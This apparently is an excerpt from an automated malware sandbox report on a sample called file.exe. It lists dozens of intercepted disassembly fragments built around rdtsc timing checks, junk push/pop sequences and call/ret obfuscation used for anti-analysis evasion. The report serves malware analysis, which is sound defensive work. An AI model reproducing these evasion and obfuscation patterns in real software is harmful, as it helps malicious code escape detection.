Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100C81F second address: 100C823 instructions:
    0x00000000 rdtsc
    0x00000002 push eax
    0x00000003 push edx
    0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100F831 second address: 100F835 instructions:
    0x00000000 rdtsc
    0x00000002 push eax
    0x00000003 push edx
    0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100F835 second address: 100F83B instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 pop edx
    0x00000005 pop eax
    0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100F83B second address: 100F846 instructions:
    0x00000000 rdtsc
    0x00000002 pushad
    0x00000003 jnc 00007F8114E11BE6h
    0x00000009 push eax
    0x0000000a push edx
    0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100F8A0 second address: 100F8CD instructions:
    0x00000000 rdtsc
    0x00000002 jmp 00007F8114B92473h
    0x00000007 pop edx
    0x00000008 pop eax
    0x00000009 nop
    0x0000000a mov di, ax
    0x0000000d push 00000000h
    0x0000000f mov ecx, dword ptr [ebp+122D3886h]
    0x00000015 push D2F8E753h
    0x0000001a push edi
    0x0000001b push eax
    0x0000001c push edx
    0x0000001d pushad
    0x0000001e popad
    0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100FA1F second address: 100FA6B instructions:
    0x00000000 rdtsc
    0x00000002 jmp 00007F8114E11BF2h
    0x00000007 pop edx
    0x00000008 pop eax
    0x00000009 popad
    0x0000000a mov dword ptr [esp], eax
    0x0000000d adc dh, FFFFFF87h
    0x00000010 push 00000000h
    0x00000012 mov ecx, 1AA51D87h
    0x00000017 jmp 00007F8114E11BF5h
    0x0000001c push 9C69FA65h
    0x00000021 push eax
    0x00000022 push edx
    0x00000023 ja 00007F8114E11BECh
    0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100FA6B second address: 100FA70 instructions:
    0x00000000 rdtsc
    0x00000002 pushad
    0x00000003 push eax
    0x00000004 push edx
    0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FA70 second address: 100FB1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8114E11BF9h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 6396061Bh 0x00000013 jno 00007F8114E11BF3h 0x00000019 mov di, A512h 0x0000001d push 00000003h 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F8114E11BE8h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 push edi 0x0000003a jne 00007F8114E11BE8h 0x00000040 pop esi 0x00000041 push 00000000h 0x00000043 push edi 0x00000044 adc edx, 7EACD800h 0x0000004a pop edx 0x0000004b mov dword ptr [ebp+122D2D38h], ecx 0x00000051 push 00000003h 0x00000053 push 00000000h 0x00000055 push ebp 0x00000056 call 00007F8114E11BE8h 0x0000005b pop ebp 0x0000005c mov dword ptr [esp+04h], ebp 0x00000060 add dword ptr [esp+04h], 00000014h 0x00000068 inc ebp 0x00000069 push ebp 0x0000006a ret 0x0000006b pop ebp 0x0000006c ret 0x0000006d add di, B150h 0x00000072 push A50AECDAh 0x00000077 je 00007F8114E11BF8h 0x0000007d push eax 0x0000007e push edx 0x0000007f jne 00007F8114E11BE6h 0x00000085 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FB1C second address: 100FB20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FB20 second address: 100FB50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 650AECDAh 0x0000000d ja 00007F8114E11BF1h 0x00000013 lea ebx, dword ptr [ebp+12451781h] 0x00000019 xor esi, dword ptr [ebp+122D37EEh] 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 push ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FB50 second address: 100FB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FC09 second address: 100FCAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114E11BF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F8114E11BECh 0x0000000f popad 0x00000010 xor dword ptr [esp], 6817821Ah 0x00000017 mov edx, dword ptr [ebp+122D3976h] 0x0000001d push 00000003h 0x0000001f mov ecx, dword ptr [ebp+122D2D3Dh] 0x00000025 push 00000000h 0x00000027 mov esi, 0A1B22AEh 0x0000002c push 00000003h 0x0000002e mov dx, ax 0x00000031 push 462233A5h 0x00000036 jmp 00007F8114E11BF9h 0x0000003b add dword ptr [esp], 79DDCC5Bh 0x00000042 push 00000000h 0x00000044 push edi 0x00000045 call 00007F8114E11BE8h 0x0000004a pop edi 0x0000004b mov dword ptr [esp+04h], edi 0x0000004f add dword ptr [esp+04h], 00000017h 0x00000057 inc edi 0x00000058 push edi 0x00000059 ret 0x0000005a pop edi 0x0000005b ret 0x0000005c mov esi, dword ptr [ebp+122D3962h] 0x00000062 lea ebx, dword ptr [ebp+1245178Ch] 0x00000068 mov dword ptr [ebp+122D1801h], eax 0x0000006e push eax 0x0000006f jnp 00007F8114E11BEEh 0x00000075 push ebx 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D8F5 second address: 102D901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F8114B92466h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D901 second address: 102D909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102DBD4 second address: 102DBDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102DEAD second address: 102DEB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102DEB1 second address: 102DEB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E2BB second address: 102E2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jl 00007F8114E11BF4h 0x0000000b popad 0x0000000c pushad 0x0000000d jbe 00007F8114E11BF2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E2DE second address: 102E2FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8114B92466h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8114B92474h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E864 second address: 102E869 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E869 second address: 102E87E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8114B92466h 0x0000000a pop edx 0x0000000b jc 00007F8114B9246Eh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E87E second address: 102E88D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F8114E11BE6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E88D second address: 102E8CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B9246Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007F8114B9246Dh 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007F8114B92472h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F132 second address: 102F15C instructions: 0x00000000 rdtsc 0x00000002 je 00007F8114E11BECh 0x00000008 pushad 0x00000009 jmp 00007F8114E11BEDh 0x0000000e jl 00007F8114E11BE6h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F2AE second address: 102F2B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F2B4 second address: 102F2CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114E11BF1h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F57C second address: 102F59B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8114B92466h 0x0000000a jmp 00007F8114B92474h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F59B second address: 102F5A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8114E11BE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F5A7 second address: 102F5AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F5AB second address: 102F5AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F5AF second address: 102F5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F8114B9247Eh 0x0000000e jg 00007F8114B92472h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F5C5 second address: 102F5CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1032F9B second address: 1032F9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE8BD second address: FFE8C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE8C3 second address: FFE8DC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103679B second address: 10367B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8114E11BEAh 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jl 00007F8114E11BECh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10367B5 second address: 10368BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8114B9247Eh 0x0000000a popad 0x0000000b nop 0x0000000c jbe 00007F8114B92475h 0x00000012 jmp 00007F8114B9246Fh 0x00000017 push dword ptr fs:[00000000h] 0x0000001e jmp 00007F8114B92471h 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a pushad 0x0000002b jo 00007F8114B9246Bh 0x00000031 mov ecx, 146FD65Eh 0x00000036 pushad 0x00000037 mov di, 1069h 0x0000003b mov di, dx 0x0000003e popad 0x0000003f popad 0x00000040 lea eax, dword ptr [ebp+12478CF5h] 0x00000046 ja 00007F8114B92467h 0x0000004c mov dword ptr [eax+01h], esp 0x0000004f pushad 0x00000050 jmp 00007F8114B92477h 0x00000055 popad 0x00000056 stc 0x00000057 lea eax, dword ptr [ebp+12478D29h] 0x0000005d pushad 0x0000005e sbb bh, 0000002Ah 0x00000061 sub bx, 7400h 0x00000066 popad 0x00000067 mov dword ptr [eax+01h], ebp 0x0000006a je 00007F8114B92479h 0x00000070 jmp 00007F8114B92473h 0x00000075 js 00007F8114B92467h 0x0000007b mov byte ptr [ebp+122D19F5h], 0000004Fh 0x00000082 jmp 00007F8114B9246Fh 0x00000087 call 00007F8114B92469h 0x0000008c push eax 0x0000008d push edx 0x0000008e pushad 0x0000008f jo 00007F8114B92466h 0x00000095 jmp 00007F8114B92474h 0x0000009a popad 0x0000009b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10368BD second address: 10368F0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8114E11BE8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F8114E11BE8h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007F8114E11BF3h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10368F0 second address: 10368F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10368F5 second address: 10368FA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10368FA second address: 1036921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F8114B92475h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036921 second address: 103692B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1005323 second address: 100533C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8114B92473h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100533C second address: 1005341 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A192 second address: 103A198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A198 second address: 103A19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A19E second address: 103A1A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A1A7 second address: 103A1AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A1AB second address: 103A1CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F8114B92478h 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A95B second address: 103A963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103AAD6 second address: 103AAE1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007F8114B92466h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103AC60 second address: 103AC7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F8114E11BEEh 0x0000000b jnl 00007F8114E11BE6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 jbe 00007F8114E11BE6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103AC7F second address: 103AC90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 jmp 00007F8114B9246Ah 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103AC90 second address: 103AC9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F8114E11BE6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103AC9C second address: 103ACAB instructions: 0x00000000 rdtsc 0x00000002 je 00007F8114B92466h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103E88B second address: 103E890 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103EC36 second address: 103EC40 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103ED62 second address: 103ED6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F8114E11BE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103EE18 second address: 103EE28 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F1CA second address: 103F22C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F8114E11BF3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f jnp 00007F8114E11BFBh 0x00000015 pop ebx 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F8114E11BE8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F22C second address: 103F230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F230 second address: 103F234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F234 second address: 103F23A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F23A second address: 103F23F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F763 second address: 103F767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F767 second address: 103F7CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8114E11BF2h 0x00000008 jg 00007F8114E11BE6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push 00000000h 0x00000014 jmp 00007F8114E11BF2h 0x00000019 movsx esi, ax 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F8114E11BE8h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F7CA second address: 103F7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F7CE second address: 103F7E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114E11BF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10401A0 second address: 10401A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10401A4 second address: 10401AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1040270 second address: 1040276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1041DF9 second address: 1041DFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10431EC second address: 1043245 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp], eax 0x0000000e push eax 0x0000000f pop edi 0x00000010 sub edi, 48F02900h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F8114B92468h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 push 00000000h 0x00000034 mov edi, dword ptr [ebp+122D36BCh] 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d ja 00007F8114B92474h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043C57 second address: 1043C5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10446DA second address: 10446DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10446DE second address: 10446E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10476A1 second address: 10476BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B92472h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046827 second address: 104682B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104878E second address: 1048792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1048792 second address: 1048798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1048798 second address: 10487E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B9246Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D2BBEh], ebx 0x00000012 push 00000000h 0x00000014 mov ebx, dword ptr [ebp+122D1B3Dh] 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007F8114B92468h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 sub di, 74F6h 0x0000003b push eax 0x0000003c push ecx 0x0000003d push eax 0x0000003e push edx 0x0000003f jc 00007F8114B92466h 0x00000045 rdtsc
